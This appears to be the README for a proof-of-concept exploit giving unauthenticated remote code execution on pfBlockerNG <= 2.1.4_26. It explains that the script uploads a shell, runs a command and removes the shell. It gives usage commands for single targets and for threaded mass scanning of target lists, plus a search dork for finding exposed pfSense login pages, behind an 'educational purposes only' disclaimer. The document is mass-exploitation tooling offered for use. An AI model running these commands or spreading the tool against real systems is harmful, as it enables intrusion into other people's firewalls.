This script is a proof-of-concept exploit for pfBlockerNG <= 2.1.4_26 that allows for remote code execution. It takes a single target URL or a list of URLs, uploads a shell, executes a command, and then deletes the shell.
This script requires Python 3.x and the requests and concurrent.futures modules to be installed. You can install these modules by running:
pip3 install requests concurrent.futuresor
pip3 install -r requirements.txtusage: exploit.py [-h] [-c COMMAND] [-l LIST] [-i IP] [-t THREADS] [-o OUTPUT]
pfBlockerNG <= 2.1.4_26 Unauth RCE
options:
-h, --help show this help message and exit
-c COMMAND, --command COMMAND
Console Command ('id')
-l LIST, --list LIST List of targets (list.txt)
-i IP, --ip IP Base target uri (ex. http://target-uri/)
-t THREADS, --threads THREADS
Number of threads for mass scan
-o OUTPUT, --output OUTPUT
Output file (vuln.txt)
To exploit a single target, use the -i or --ip flag and specify the base URL or IP Address:
python3 exploit.py -i http://target-uri/ -c 'id'To scan a list of targets, use the -l or --list flag and specify the path to the list:
python3 exploit.py -l list.txt -c 'id' -t 50The -t or --threads flag can be used to specify the number of threads to use for the scan.
If the -o or --output flag is specified, the list of vulnerable targets will be written to a file:
python3 exploit.py -l list.txt -c 'id' -o vuln.txt
http.title:"pfSense - Login" "Server: nginx" "Set-Cookie: PHPSESSID="This script is for educational purposes only. Use at your own risk.